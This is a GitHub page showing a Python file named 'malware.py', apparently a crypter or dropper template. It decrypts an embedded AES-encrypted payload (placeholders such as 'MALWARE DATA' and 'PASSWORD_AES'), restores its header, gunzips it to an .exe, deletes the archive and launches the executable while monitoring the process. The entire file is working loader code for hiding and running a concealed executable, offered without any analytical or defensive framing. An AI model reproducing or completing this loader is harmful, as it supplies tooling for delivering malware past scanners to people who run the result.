-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathmalware.py
More file actions
77 lines (59 loc) · 2.54 KB
/
Copy pathmalware.py
File metadata and controls
77 lines (59 loc) · 2.54 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#Encoding: UTF-8
import gzip as <gzip>
import shutil as <shutil>
import os as <os>
from cryptography.hazmat.primitives.kdf.scrypt import Scrypt as <Scrypt>
from cryptography.hazmat.backends import default_backend as <default_backend>
from cryptography.hazmat.primitives.ciphers import Cipher as <Cipher>
from cryptography.hazmat.primitives.ciphers import algorithms as <algorithms>
from cryptography.hazmat.primitives.ciphers import modes as <modes>
import psutil as <psutil>
import time
def <run_executable>(<executable_path>):
<process> = <psutil>.Popen([<executable_path>])
try:
while <process>.is_running():
with <process>.oneshot():
<cpu_usage> = <process>.cpu_percent(interval=1)
<memory_info> = <process>.memory_info()
time.sleep(1)
exit_code = <process>.wait()
except <psutil>.NoSuchProcess:
print("Process terminated")
except <psutil>.AccessDenied:
print("Access denied to the process")
except Exception as e:
print(f"An error occurred: {e}")
def <decompress_file>(<input_file_path>, <output_file_path>):
with <gzip>.open(<input_file_path>, 'rb') as <f_in>:
with open(<output_file_path>, 'wb') as <f_out>:
<shutil>.copyfileobj(<f_in>, <f_out>)
<os>.remove(<input_file_path>)
def <aes_decrypt>():
<password> = "<PASSWORD_AES>"
<salt> = bytes.fromhex("<SALT_AES>")
<iv> = bytes.fromhex("<IV_AES>")
<malware_data> = "<MALWARE DATA>"
<encrypted_data> = bytes.fromhex(<malware_data>[32:])
<original_header> = bytes.fromhex("<ORIGINAL_HEADER>")
<kdf> = <Scrypt>(
salt=<salt>,
length=32,
n=2**14,
r=8,
p=1,
backend=<default_backend>()
)
<key> = <kdf>.derive(<password>.encode())
<cipher> = <Cipher>(<algorithms>.AES(<key>), <modes>.CBC(<iv>), backend=<default_backend>())
<decryptor> = <cipher>.decryptor()
<decrypted_data> = <decryptor>.update(<encrypted_data>) + <decryptor>.finalize()
<unpadded_data> = <decrypted_data>.rstrip(b' ')
return <original_header> + <unpadded_data>
<data> = <aes_decrypt>()
<recfile> = "<GZIP_FILE>"
<origifile> = "<EXEC_FILE>.exe"
with open(<recfile>, "wb") as <DecZIPFILE>:
<DecZIPFILE>.write(<data>)
<decompress_file>(<recfile>, <origifile>)
<run_executable>(<origifile>)